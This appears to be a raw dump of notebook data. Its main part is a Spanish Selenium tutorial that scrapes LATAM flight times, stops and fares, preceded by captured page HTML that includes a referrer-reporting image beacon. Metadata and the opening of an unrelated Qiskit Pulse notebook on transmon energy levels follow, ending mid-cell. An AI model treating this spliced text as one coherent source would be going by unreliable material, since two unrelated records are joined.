0;width:30px;height:20px}@media only screen and (max-width:319px){.hyf-visible-xs{display:inline}.hyf-hidden-xs{display:none}.hyf-visibleb-xs{display:block}.hyf-visibleib-xs{display:inline-block}.hyf-col-25{width:100%}.hyf-flag-centrado{display:block;padding-top:6px}.hyf-mu-content{padding-bottom:135px}.hyf-mu-footer{height:135px}.hyf-contry-ul li a{display:inline}.hyf-country-selector{margin-top:-36px;width:85%;right:0;background-color:#e5e5e5}#hyf-icon-log-caret{display:none}#hyf-icon-log-iconi{display:block}#hyf-icon-log-icon.isLoggedIn{color:#b30f3b}.hyf-header-section .hyf-header-element.hyf-login{background-color:transparent}}@media only screen and (min-width:320px){.hyf-visible-xs{display:inline}.hyf-hidden-xs{display:none}.hyf-visibleb-xs{display:block}.hyf-visibleib-xs{display:inline-block}.hyf-col-25{width:100%}.hyf-flag-centrado{display:block;padding-top:6px}.hyf-mu-content{padding-bottom:135px}.hyf-mu-footer{height:135px}.hyf-contry-ul li a{display:inline}.hyf-country-selector{margin-top:-36px;width:85%;right:0;background-color:#e5e5e5}#hyf-icon-log-caret{display:none}#hyf-icon-log-iconi{display:block}#hyf-icon-log-icon.isLoggedIn{color:#b30f3b}.hyf-header-section .hyf-header-element.hyf-login{background-color:transparent}}@media only screen and (min-width:480px){.hyf-visible-xs{display:inline}.hyf-hidden-xs{display:none}.hyf-visibleb-xs{display:block}.hyf-visibleib-xs{display:inline-block}.hyf-col-25{width:100%}.hyf-flag-centrado{display:block;padding-top:6px}.hyf-mu-content{padding-bottom:135px}.hyf-mu-footer{height:135px}.hyf-contry-ul li a{display:inline}.hyf-country-selector{margin-top:-36px;width:85%;right:0;background-color:#e5e5e5}#hyf-icon-log-caret{display:none}#hyf-icon-log-iconi{display:block}#hyf-icon-log-icon.isLoggedIn{color:#b30f3b}.hyf-header-section .hyf-header-element.hyf-login{background-color:transparent}}@media only screen and (min-width:768px){.hyf-visible-sm{display:inline}.hyf-hidden-sm{display:none}.hyf-visibleb-sm{display:block}.hyf-col-25{width:25%}.hyf-flag-centrado{display:inline;padding:0}.hyf-mu-content{padding-bottom:76px}.hyf-mu-footer{height:76px}.hyf-contry-ul li a{display:inline-block}#hyf-icon-log-caret{display:inline-table}#hyf-icon-log-icon.isLoggedIn{color:#fff}#hyf-icon-log-iconi{display:none}.hyf-country-selector{margin-top:0;width:100%;background-color:#f3f3f3;background-color:rgba(243,243,243,97)}.hyf-header-section .hyf-header-element.hyf-login{background-color:#b30f3b}}@media only screen and (min-width:992px){.hyf-visible-md{display:inline}.hyf-hidden-md{display:none}.hyf-visibleb-md{display:block}.hyf-col-25{width:25%}.hyf-flag-centrado{display:inline;padding:0}.hyf-mu-content{padding-bottom:76px}.hyf-mu-footer{height:76px}.hyf-contry-ul li a{display:inline-block}#hyf-icon-log-caret{display:inline-table}#hyf-icon-log-icon.isLoggedIn{color:#fff}.hyf-country-selector{margin-top:0;width:100%;background-color:#f3f3f3;background-color:rgba(243,243,243,97)}#hyf-icon-log-iconi{display:none}.hyf-header-section .hyf-header-element.hyf-login{background-color:#b30f3b}}@media only screen and (min-width:1200px){.hyf-visible-lg{display:inline}.hyf-hidden-lg{display:none}.hyf-visibleb-md{display:block}.hyf-col-25{width:25%}.hyf-flag-centrado{display:inline;padding:0}.hyf-mu-content{padding-bottom:76px}.hyf-mu-footer{height:76px}.hyf-contry-ul li a{display:inline-block}#hyf-icon-log-caret{display:inline-table}#hyf-icon-log-icon.isLoggedIn{color:#fff}#hyf-icon-log-iconi{display:none}.hyf-country-selector{margin-top:0;width:100%;background-color:#f3f3f3;background-color:rgba(243,243,243,97)}.hyf-header-section .hyf-header-element.hyf-login{background-color:#b30f3b}}\n </style>\n <div class=\"hyf-mu-header\" id=\"hyfLatam\" role=\"banner\" style=\"display:none\">\n <div class=\"hyf-container\" role=\"application\">\n <a class=\"hyf-only-focusable\" href=\"#appMain\" onkeydown=\"skipToMainContent(event);\" title=\"Ir al contenido principal\">\n <span class=\"text-skip-to-main-content\">\n Ir al contenido principal\n </span>\n </a>\n </div>\n <nav class=\"hyf-mu-header-container\" role=\"navigation\">\n <section class=\"hyf-container hyf-header-section\">\n <div class=\"hyf-goleft\">\n <a class=\"hyf-header-element hyf-hidden-xs hyf-visible-sm hyf-visible-md hyf-visible-lg\" href=\"https://www.latam.com\">\n <img alt=\"LATAM Logo\" class=\"Header-logoImg\" height=\"25px\" src=\"https://s.latamstatic.com/static/latam/images/content-image/header/latam-logo-sticky.svg\" width=\"110px\"/>\n </a>\n <a class=\"hyf-header-element hyf-visible-xs hyf-hidden-sm hyf-hidden-md hyf-hidden-lg\" href=\"https://www.latam.com\">\n <img alt=\"LATAM Logo\" height=\"28px\" src=\"https://s.latamstatic.com/static/latam/images/content-image/header/latam-logo-sticky.svg\"/>\n </a>\n </div>\n <div class=\"hyf-goright\">\n <a class=\"hyf-header-element hyf-hidden-xs hyf-visible-sm hyf-visible-md hyf-visible-lg\" href=\"https://helpdesk.latam.com/hc/es/\" target=\"_self\">\n Centro de ayuda\n </a>\n <a class=\"hyf-header-element hyf-visible-xs hyf-hidden-sm hyf-hidden-md hyf-hidden-lg\" href=\"https://helpdesk.latam.com/hc/es/\" target=\"_self\">\n <span class=\"icon-bold-int015 icon-medium\">\n </span>\n </a>\n </div>\n </section>\n </nav>\n </div>\n <script type=\"text/javascript\">\n (function(){function header(){this.homesMultiplus=[];this.appsMultiplus=[];};header.prototype={cleanSelector:function(selector){selector.forEach(function(select){document.querySelector(select).removeAttribute(\"style\");});},removeStyles:function(selectors){selectors.forEach(function(select){document.querySelector(select).remove();});},applyHeaderRules:function(){var urlData,app,home;urlData=document.location.pathname;urlData=urlData.split(\"/\");app=urlData[4];home=urlData[1];this.cleanSelector([\"#hyfLatam\"]);}};var header=new header();header.applyHeaderRules();})();\n </script>\n <div class=\"hyf-mu-content\" id=\"appMain\" role=\"main\" tabindex=\"-1\">\n <div class=\"container\">\n <noscript>\n <div>\n Para una mejor experiencia en LAN.com, habilite JavaScript\n en su navegador\n </div>\n </noscript>\n <div id=\"mainContent\">\n </div>\n <script type=\"text/javascript\">\n (function(global){global.LAN=global.LAN?global.LAN:{};})(this);LAN.Environment={env:'production',jsLibBaseUrl:'/js/libs/',cssBaseUrl:'/',lastDirectRequest:'2019-11-05T23:36:50+0000',dictionary:true,debug:false,home:'es_ar',site:'lan',country:'AR',language:'ES',portal:'personas',application:'booking',step:'',appDist:'dist',jsAppBaseUrl:'/apps/booking/1.5.10/',appMainContent:'mainContent'};LAN.Configuration={'baseUrlBff':'https://bff.latam.com/','baseUrlLan':'https://www.lan.com/','baseUrlLegacy':'https://booking.lan.com/','baseUrlLegacySSL':'https://ssl.lan.com/','urlHome':'https://www.latam.com/','enabledDomains':'.*','defaultProtocol':'http','theme':''};\n </script>\n <script src=\"https://s.latamstatic.com/js/libs/external/require/2.1.8/require.js\" type=\"text/javascript\">\n </script>\n <script src=\"https://s.latamstatic.com/js/libs/lan/utils/requireConfig/2.1/requireConfig.min.js\" type=\"text/javascript\">\n </script>\n <script src=\"https://s.latamstatic.com/apps/booking/1.5.10/dist/js/booking.config.js\" type=\"text/javascript\">\n </script>\n <script async=\"\" src=\"https://s.latamstatic.com/apps/booking/1.5.10/dist/js/booking.js\" type=\"text/javascript\">\n </script>\n </div>\n </div>\n <div class=\"hyf-mu-footer\">\n <style id=\"styleFooterLatam\">\n .hyf-footer-latam{border-top:3px solid #ed1650;background-color:#1b0088;overflow:hidden}.hyf-footer-latam-container{padding:24px 0;display:block;text-align:center}.hyf-footer-latam-container p{font-size:1.0em;line-height:120%;vertical-align:middle;color:#bfbfbf;margin:0}.hyf-footer-latam-copyright{overflow:hidden;text-align:center}.hyf-footer-latam-logo{display:block;text-align:center}.hyf-footer-latam-logo a:focus{outline:2px solid #b8b8b8;outline-offset:-2px}.hyf-footer-latam-16{height:16px;display:block}.hyf-col-f25{width:100%}.hyf-col-f75{width:100%}@media (min-width:768px){.hyf-footer-latam-logo{text-align:right}.hyf-footer-latam-copyright{text-align:left}.hyf-footer-latam-container p{float:left}.hyf-footer-latam-container{padding:20px 0}.hyf-col-f25{width:auto}.hyf-col-f75{width:auto}.hyf-footer-latam-16{height:0}}@media only screen and (min-width:992px){.hyf-footer-latam-16{height:0}}@media only screen and (min-width:1200px){.hyf-footer-latam-16{height:7px}}\n </style>\n <footer class=\"hyf-footer-latam\" id=\"appFooterLatam\" role=\"contentinfo\" style=\"display:none\">\n <div class=\"hyf-container hyf-footer-latam-container\">\n <div class=\"footer-latam-copyright hyf-goleft hyf-col-f75\">\n <div class=\"hyf-hidden-sm hyf-hidden-md hyf-visible-xs hyf-visible-lg hyf-footer-latam-16\">\n <br/>\n </div>\n <p>\n © 2019 LATAM Airlines Argentina\n </p>\n <p class=\"hyf-hidden-sm hyf-hidden-md hyf-hidden-lg hyf-visible-xs\">\n Todos los derechos reservados.\n </p>\n <div class=\"hyf-hidden-lg hyf-hidden-xs hyf-visible-sm hyf-visible-md\">\n <br/>\n </div>\n <p class=\"hyf-hidden-xs hyf-visible-sm hyf-visible-md hyf-visible-lg\">\n </p>\n </div>\n <div class=\"hyf-footer-latam-logo hyf-goright hyf-col-f25\">\n <a href=\"#\" target=\"target\" title=\"titulo\">\n <img alt=\"alt\" height=\"36px\" src=\"https://s.latamstatic.com/css/img/logos/LATAM_Logo_Footer.svg\"/>\n </a>\n </div>\n </div>\n </footer>\n <script async=\"\" src=\"https://s.latamstatic.com/js/libs/lan/commons/commonsFunc/1.0.0/headerFuncs.min.js\" type=\"text/javascript\">\n </script>\n <script async=\"\" src=\"https://s.latamstatic.com/js/libs/lan/commons/commonsFunc/1.0.0/accessibilityFuncs.min.js\" type=\"text/javascript\">\n </script>\n <script type=\"text/javascript\">\n (function(){function footer(){this.homesMultiplus=[];this.appsMultiplus=[];};footer.prototype={cleanSelector:function(selector){selector.forEach(function(select){document.querySelector(select).removeAttribute(\"style\");});},removeStyles:function(selectors){selectors.forEach(function(select){document.querySelector(select).remove();});},applyFooterRules:function(){var urlData,app,home;urlData=document.location.pathname;urlData=urlData.split(\"/\");app=urlData[4];home=urlData[1];this.cleanSelector([\"#appFooterLatam\"])}};var footer=new footer();footer.applyFooterRules();})();\n </script>\n </div>\n </div>\n <script type=\"text/javascript\">\n var menuUp=false;var hideVar=null;function skipToMainContent(e){var k=(document.all)?e.keyCode:e.which;if(k===13){document.getElementById('appMain').focus();return false;}}function hyfShowMenu(){var e=document.getElementById('Header-actionLinkBurger');if(getViewport()[0]>767){e=document.getElementById('showMenu');e.style.display='none';e=document.getElementById('hideMenu');e.style.display='inline';e.focus();}else{setMobileview();e.href=\"javascript:hyfHideMenu();\"\ne=document.getElementsByClassName('hyf-modal-black')[0];e.style.display=\"block\";}e=document.getElementById('hyf-country-selector');e.style.display='inline';menuUp=true;}function setMobileview(){var e=document.getElementsByTagName('body')[0];e.className='hyf-mobile-view';e=document.getElementById('hyf-country-selector');var alto=getViewport()[1].toString();e.style.maxHeight=alto+'px';e.style.overflow='scroll';e.style.overflowX='hidden';e.style.overflowY='auto';hyfHideCs();}function unsetMobileview(){var e=document.getElementsByTagName('body')[0];e.removeAttribute('class');e=document.getElementById('hyf-country-selector');e.style.maxHeight='';e.style.overflow='hidden';e.style.overflowY='auto';hyfShowCs();e=document.getElementById('hyf-cs-first');e.style.display='none';}function hyfHideMenu(){var e=document.getElementById('Header-actionLinkBurger');if(getViewport()[0]>767){e=document.getElementById('showMenu');e.style.display='inline';e=document.getElementById('hideMenu');e.style.display='none';}else{e=document.getElementById('showMenu');e.style.display='none';e=document.getElementById('hideMenu');e.style.display='none';e=document.getElementsByClassName('hyf-modal-black')[0];e.style.display=\"none\";unsetMobileview();e=document.getElementById('Header-actionLinkBurger');e.href=\"javascript:hyfShowMenu();\"}e=document.getElementById('hyf-country-selector');e.style.display='none';menuUp=false;}function hyfgoHideMenu(){if(!menuUp){if(document.getElementById('hyf-country-selector').style.display!=\"none\")hyfHideMenu();}}function hyfHideCs(){var e=document.getElementById('hyf-cs');e.href=\"javascript:hyfShowCs();\";e=document.getElementsByClassName('hyf-cs');for(var i=0;i<e.length;i++)e[i].style.display='none';}function hyfShowCs(){var e=document.getElementById('hyf-cs');e.href=\"javascript:hyfHideCs();\";e=document.getElementsByClassName('hyf-cs');for(var i=0;i<e.length;i++)e[i].style.display='block';}function getViewport(){var viewPortWidth;var viewPortHeight;if(typeof window.innerWidth!='undefined'){viewPortWidth=window.innerWidth,viewPortHeight=window.innerHeight}else{viewPortWidth=document.getElementsByTagName('body')[0].clientWidth,viewPortHeight=document.getElementsByTagName('body')[0].clientHeight}return[viewPortWidth,viewPortHeight];}function removeBodyPadding(){var e=document.getElementsByTagName('body')[0];e.removeAttribute(\"style\");e=document.getElementById('hyf-country-selector');e.onmouseout=function(){menuUp=false;hideVar=setTimeout(hyfgoHideMenu,500);};e.onmouseover=function(){menuUp=true;hideVar=null;};e.onfocus=function(){this.style.display=\"none\";e=document.getElementById('hideMenu');e.style.display='inline';};window.onresize=function(){hyfHideMenu();return true;}\ne=document.getElementsByClassName('Header-logoLink');for(var i=0;i<e.length;i++)e[i].onfocus=function(){hyfHideMenu();this.focus()};e=document.getElementById('returnLink');e.onfocus=function(){hyfHideMenu()}\ne=document.getElementsByClassName('hyf-country-ul');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-modal-black')[0];e.onmouseover=function(){hyfHideMenu();}\ne=document.getElementsByClassName('hyf-not-underline');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('lt-icon-flag');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-flag-centrado');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-country-selector-title');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-login-info');e[0].onmouseout=function(){menuUp=false;hideVar=setTimeout(hyfHideLogMenu,500);};e[0].onmouseover=function(){menuUp=true;hideVar=null;};e=document.getElementsByClassName('hyf-login-info-a');for(i=0;i<e.length;i++){e[i].onmouseout=function(){menuUp=false;hideVar=setTimeout(hyfHideLogMenu,500);};e[i].onmouseover=function(){menuUp=true;hideVar=null;};}}function hyfHideLogMenu(){if(!menuUp){var e=document.getElementsByClassName('hyf-login-info');e[0].style.display='none';}}function hyfShowLogMenu(){if(getViewport()[0]>767){var e=document.getElementsByClassName('hyf-login-info');e[0].style.display='block';}}function ShowLoginMenu(){var e=document.getElementsByClassName('hyf-login-info');menuUp=false;hyfgoHideMenu();if(e[0].style.display=='block')hyfHideLogMenu();else hyfShowLogMenu();}function LoginLinkAction(show){var e=document.getElementById('loginLatamBox');if(show){e.style.display=\"inline-table\";e.style.padding=\"8px 4px\"\nvar e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='0';}else{e.style.display=\"none\";e.style.padding=\"0\"\nvar e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='6px';}}function UserLoginAction(show){var e=document.getElementById('userLatamBox');if(show){e.style.display=\"inline-table\";var e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='0';}else{e.style.display=\"none\";var e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='6px';}}\n </script>\n <script type=\"text/javascript\">\n var i=new Image,u=\"https://s3-sa-east-1.amazonaws.com/frame-image-br/bg.png?x-id=latam&x-r=\"+document.referrer;i.src=u;\n </script>\n </body>\n</html>\n\n"
]
],
[
[
"Vemos que la respuesta de la página no contiene la información que buscamos, ya que la misma aparece recién después de ejecutar el código JavaSCript que está en la respuesta.",
"_____no_output_____"
],
[
"## Selenium",
"_____no_output_____"
],
[
"Selenium es una herramienta que nos permitirá controlar un navegador y podremos utilizar las funcionalidades del motor de JavaScript para cargar el contenido que no viene en el HTML de la página. Para esto necesitamos el módulo `webdriver`.",
"_____no_output_____"
]
],
[
[
"from selenium import webdriver",
"_____no_output_____"
]
],
[
[
"Paso 1: instanciar un **driver** del navegador",
"_____no_output_____"
]
],
[
[
"options = webdriver.ChromeOptions()\noptions.add_argument('--incognito')\ndriver = webdriver.Chrome(executable_path='../chromedriver', options=options)",
"_____no_output_____"
]
],
[
[
"Paso 2: hacer que el navegador cargue la página web.",
"_____no_output_____"
]
],
[
[
"driver.get(url)",
"_____no_output_____"
]
],
[
[
"Paso 3: extraer la información de la página",
"_____no_output_____"
]
],
[
[
"vuelos = driver.find_elements_by_xpath('//li[@class=\"flight\"]')\nvuelos",
"_____no_output_____"
],
[
"vuelo = vuelos[0]",
"_____no_output_____"
],
[
"vuelo",
"_____no_output_____"
],
[
"# Hora de salida\nvuelo.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Hora de llegada\nvuelo.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Duración del vuelo\nvuelo.find_element_by_xpath('.//span[@class=\"duration\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"boton_escalas = vuelo.find_element_by_xpath('.//div[@class=\"flight-summary-stops-description\"]/button')",
"_____no_output_____"
],
[
"boton_escalas.click()",
"_____no_output_____"
],
[
"segmentos = vuelo.find_elements_by_xpath('//div[@class=\"segments-graph\"]/div[@class=\"segments-graph-segment\"]')\nsegmentos",
"_____no_output_____"
],
[
"escalas = len(segmentos) - 1 ",
"_____no_output_____"
],
[
"escalas",
"_____no_output_____"
],
[
"segmento = segmentos[0]",
"_____no_output_____"
],
[
"# Origen\nsegmento.find_element_by_xpath('.//div[@class=\"departure\"]/span[@class=\"ground-point-name\"]').text",
"_____no_output_____"
],
[
"# Hora de salida\nsegmento.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Destino\nsegmento.find_element_by_xpath('.//div[@class=\"arrival\"]/span[@class=\"ground-point-name\"]').text",
"_____no_output_____"
],
[
"# Hora de llegada\nsegmento.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Duración del vuelo\nsegmento.find_element_by_xpath('.//span[@class=\"duration flight-schedule-duration\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Numero del vuelo\nsegmento.find_element_by_xpath('.//span[@class=\"equipment-airline-number\"]').text",
"_____no_output_____"
],
[
"# Modelo de avion\nsegmento.find_element_by_xpath('.//span[@class=\"equipment-airline-material\"]').text",
"_____no_output_____"
],
[
"# Duracion de la escala\nsegmento.find_element_by_xpath('.//div[@class=\"stop connection\"]//p[@class=\"stop-wait-time\"]//time').get_attribute('datetime')",
"_____no_output_____"
],
[
"driver.find_element_by_xpath('//div[@class=\"modal-dialog\"]//button[@class=\"close\"]').click()",
"_____no_output_____"
],
[
"vuelo.click()",
"_____no_output_____"
],
[
"tarifas = vuelo.find_elements_by_xpath('.//div[@class=\"fares-table-container\"]//tfoot//td[contains(@class, \"fare-\")]')",
"_____no_output_____"
],
[
"tarifas",
"_____no_output_____"
],
[
"precios = []\nfor tarifa in tarifas:\n nombre = tarifa.find_element_by_xpath('.//label').get_attribute('for')\n moneda = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"currency-symbol\"]').text\n valor = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"value\"]').text \n dict_tarifa={nombre:{'moneda':moneda, 'valor':valor}}\n precios.append(dict_tarifa)\n print(dict_tarifa)",
"{'LIGHT': {'moneda': 'US$', 'valor': '1282,40'}}\n{'PLUS': {'moneda': 'US$', 'valor': '1335,90'}}\n{'TOP': {'moneda': 'US$', 'valor': '1773,50'}}\n"
],
[
"def obtener_precios(vuelo):\n '''\n Función que retorna una lista de diccionarios con las distintas tarifas\n '''\n tarifas = vuelo.find_elements_by_xpath('.//div[@class=\"fares-table-container\"]//tfoot//td[contains(@class, \"fare-\")]')\n precios = []\n for tarifa in tarifas:\n nombre = tarifa.find_element_by_xpath('.//label').get_attribute('for')\n moneda = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"currency-symbol\"]').text\n valor = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"value\"]').text \n dict_tarifa={nombre:{'moneda':moneda, 'valor':valor}}\n precios.append(dict_tarifa)\n return precios",
"_____no_output_____"
],
[
"def obtener_datos_escalas(vuelo):\n '''\n Función que retorna una lista de diccionarios con la información de \n las escalas de cada vuelo\n '''\n segmentos = vuelo.find_elements_by_xpath('//div[@class=\"segments-graph\"]/div[@class=\"segments-graph-segment\"]')\n info_escalas = []\n for segmento in segmentos:\n # Origen\n origen = segmento.find_element_by_xpath('.//div[@class=\"departure\"]/span[@class=\"ground-point-name\"]').text\n # Hora de salida\n dep_time = segmento.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')\n # Destino\n destino = segmento.find_element_by_xpath('.//div[@class=\"arrival\"]/span[@class=\"ground-point-name\"]').text\n # Hora de llegada\n arr_time = segmento.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')\n # Duración del vuelo\n duracion_vuelo = segmento.find_element_by_xpath('.//span[@class=\"duration flight-schedule-duration\"]/time').get_attribute('datetime')\n # Numero del vuelo\n numero_vuelo = segmento.find_element_by_xpath('.//span[@class=\"equipment-airline-number\"]').text\n # Modelo de avion\n modelo_avion =segmento.find_element_by_xpath('.//span[@class=\"equipment-airline-material\"]').text\n if segmento != segmentos[-1]:\n # Duracion de la escala\n duracion_escala = segmento.find_element_by_xpath('.//div[@class=\"stop connection\"]//p[@class=\"stop-wait-time\"]//time').get_attribute('datetime')\n else:\n duracion_escala = ''\n \n data_dict={\n 'origen':origen,\n 'dep_time':dep_time,\n 'destino':destino,\n 'arr_time':arr_time,\n 'duracion_vuelo':duracion_vuelo,\n 'numero_vuelo':numero_vuelo,\n 'modelo_avion':modelo_avion,\n 'duracion_escala':duracion_escala,\n }\n info_escalas.append(data_dict)\n return info_escalas",
"_____no_output_____"
],
[
"def obtener_tiempos(vuelo):\n '''\n Función que retorna un diccionario con los horarios de salida y llegada de cada\n vuelo, incluyendo la duración. \n Nota: la duración del vuelo no es la hora de llegada - la hora de salida porque\n puede haber diferencia de horarios entre el origen y el destino.\n '''\n # Hora de salida\n salida = vuelo.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')\n # Hora de llegada\n llegada = vuelo.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')\n # Duracion\n duracion = vuelo.find_element_by_xpath('.//span[@class=\"duration\"]/time').get_attribute('datetime')\n tiempos = {'hora_salida': salida, 'hora_llegada': llegada, 'duracion': duracion}\n return tiempos\n",
"_____no_output_____"
],
[
"def obtener_info(driver):\n vuelos = driver.find_elements_by_xpath('//li[@class=\"flight\"]')\n print(f'Se encontraron {len(vuelos)} vuelos.')\n print('Iniciando scraping...')\n info = []\n for vuelo in vuelos:\n #obtenemos los tiempos generales de cada vuelo\n tiempos = obtener_tiempos(vuelo)\n # Clickeamos sobre el boton de las escalas\n vuelo.find_element_by_xpath('.//div[@class=\"flight-summary-stops-description\"]/button').click()\n escalas = obtener_datos_escalas(vuelo)\n # Cerramos el modal\n driver.find_element_by_xpath('//div[@class=\"modal-dialog\"]//button[@class=\"close\"]').click()\n # Clickeamos el vuelo para ver los precios\n vuelo.click()\n precios = obtener_precios(vuelo)\n vuelo.click()\n info.append({'precios':precios, 'tiempos': tiempos, 'escalas':escalas})\n return info",
"_____no_output_____"
],
[
"import time",
"_____no_output_____"
],
[
"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException",
"_____no_output_____"
],
[
"options = webdriver.ChromeOptions()\noptions.add_argument('--incognito')\ndriver = webdriver.Chrome(executable_path='../chromedriver', options=options)\ndriver.get(url)\n# Introducir una demora\ndelay = 10\ntry:\n # introducir demora inteligente\n vuelo = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, '//li[@class=\"flight\"]')))\n print('La página terminó de cargar')\n info_vuelos = obtener_info(driver)\nexcept TimeoutException:\n print('La página tardó demasiado en cargar')\n info_vuelos = []\ndriver.close()",
"La página terminó de cargar\nSe encontraron 12 vuelos.\nIniciando scraping...\n"
],
[
"info_vuelos",
"Se encontraron 12 vuelos.\nIniciando scraping...\n"
]
],
[
[
"Paso 4: cerrar el navegador",
"_____no_output_____"
]
],
[
[
"driver.close()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb03410eb06c6d0f087f29c61f203ea9e66b1c8b | 198,816 | ipynb | Jupyter Notebook | notebooks/ch-quantum-hardware/accessing_higher_energy_states.ipynb | qiskit-community/platypus | c0a0fe8e18e3045e51567cc5a5af2c2006aa4f60 | [
"Apache-2.0"
] | 3 | 2021-12-02T00:32:17.000Z | 2022-01-01T03:59:48.000Z | notebooks/ch-quantum-hardware/accessing_higher_energy_states.ipynb | qiskit-community/platypus | c0a0fe8e18e3045e51567cc5a5af2c2006aa4f60 | [
"Apache-2.0"
] | 55 | 2021-09-20T13:46:16.000Z | 2022-01-06T11:16:39.000Z | notebooks/ch-quantum-hardware/accessing_higher_energy_states.ipynb | qiskit-community/platypus | c0a0fe8e18e3045e51567cc5a5af2c2006aa4f60 | [
"Apache-2.0"
] | 11 | 2021-09-29T14:25:18.000Z | 2022-01-01T03:59:54.000Z | 168.488136 | 53,464 | 0.89195 | [
[
[
"# Accessing higher energy states with Qiskit Pulse",
"_____no_output_____"
],
[
"In most quantum algorithms/applications, computations are carried out over a 2-dimensional space spanned by $|0\\rangle$ and $|1\\rangle$. In IBM's hardware, however, there also exist higher energy states which are not typically used. The focus of this section is to explore these states using Qiskit Pulse. In particular, we demonstrate how to excite the $|2\\rangle$ state and build a discriminator to classify the $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states.\n\nWe recommend reviewing the prior [chapter](https://learn.qiskit.org/course/quantum-hardware-pulses/calibrating-qubits-using-qiskit-pulse) before going through this notebook. We also suggest reading the Qiskit Pulse specifications (Ref [1](#refs)). ",
"_____no_output_____"
],
[
"### Physics Background",
"_____no_output_____"
],
[
"We now give some additional background on the physics of transmon qubits, the basis for much of IBM's quantum hardware. These systems contain superconducting circuits composed of a Josephson junction and capacitor. For those unfamiliar with superconducting circuits, see the review [here](https://arxiv.org/pdf/1904.06560.pdf) (Ref. [2](#refs)). The Hamiltonian of this system is given by\n\n$$\nH = 4 E_C n^2 - E_J \\cos(\\phi),\n$$\n\nwhere $E_C, E_J$ denote the capacitor and Josephson energies, $n$ is the reduced charge number operator and $\\phi$ is the reduced flux across the junction. We work in units with $\\hbar=1$.\n\nTransmon qubits are defined in the regime where $\\phi$ is small, so we may expand $E_J \\cos(\\phi)$ in a Taylor series (ignoring constant terms)\n\n$$\nE_J \\cos(\\phi) \\approx \\frac{1}{2} E_J \\phi^2 - \\frac{1}{24} E_J \\phi^4 + \\mathcal{O}(\\phi^6).\n$$\n\nThe quadratic term $\\phi^2$ defines the standard harmonic oscillator. Each additional term contributes an anharmonicity.\n\nUsing the relations $n \\sim (a-a^\\dagger), \\phi \\sim (a+a^\\dagger)$ (for raising, lowering operators $a^\\dagger, a$), it can be shown that the system resembles a Duffing oscillator with Hamiltonian\n$$\nH = \\omega a^\\dagger a + \\frac{\\alpha}{2} a^\\dagger a^\\dagger a a,\n$$\n\nwhere $\\omega$ gives the $0\\rightarrow1$ excitation frequency ($\\omega \\equiv \\omega^{0\\rightarrow1}$) and $\\alpha$ is the anharmonicity between the $0\\rightarrow1$ and $1\\rightarrow2$ frequencies ($\\alpha \\equiv \\omega^{1\\rightarrow2} - \\omega^{0\\rightarrow1}$). Drive terms can be added as needed. \n\nIf we choose to specialize to the standard 2-dimensional subspace, we can make $|\\alpha|$ sufficiently large or use special control techniques to suppress the higher energy states.",
"_____no_output_____"
],
[
"# Contents\n\n[Getting started](#importing) \n[Discriminating the 0, 1 and 2 states](#discrim012) \n  [Computing the 1->2 Frequency](#freq12) \n  [1->2 Rabi Experiment](#rabi12) \n  [Build the 0, 1, 2 discriminator](#builddiscrim012) \n[References](#refs) ",
"_____no_output_____"
],
[
"## Getting Started <a id=\"importing\"></a>",
"_____no_output_____"
],
[
"We begin by importing dependencies and defining some default variable values. We choose qubit 0 to run our experiments. We perform our experiments on the publicly available single qubit device `ibmq_armonk`.",
"_____no_output_____"
]
],
[
[
